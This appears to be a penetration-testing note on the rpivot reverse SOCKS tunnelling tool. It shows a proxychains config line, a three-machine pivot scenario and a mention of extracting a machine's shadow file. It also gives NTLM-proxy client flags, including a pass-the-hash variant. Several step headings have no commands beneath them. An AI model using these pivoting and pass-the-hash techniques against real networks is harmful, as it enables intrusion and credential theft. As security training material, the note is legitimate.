Rpivot

RPIVOT allows to tunnel traffic into internal network via socks 4. It works like ssh dynamic port forwarding but in the opposite direction.

Source: https://github.com/klsecservices/rpivot

Requirements

• Python 2.6/2.7

• Add this line to the /etc/proxychains.conf file:

  • socks4 127.0.0.1 1080

When to use rpivot?

Imagine this scenario:

Diagram

• A machine can connect to B

• B machine can connect to C

• C can't connect directly to A

• So, in this case, we can use rpivot from C to B proxying the access

• After that, we can access A directly from C

Open the server - Machine C

Connect the client to the server - Machine B

3rd one - Machine A

Extracting the Shadow of the 3rd machine

In Wireshark we can see that all the communication happened through port 4444 that we set up with rpivot

Wireshark Results

We can also PIVOT through a NTLM Proxy

In this case, we add in the client side these flags:

--ntlm-proxy-ip <proxy_ip> --ntlm-proxy-port 8080 --domain DOMAIN.COM --username John --password password

Or using pass the hash:

--ntlm-proxy-ip <proxy_ip> --ntlm-proxy-port 8080 --domain DOMAIN.COM --username John --hashes <hash>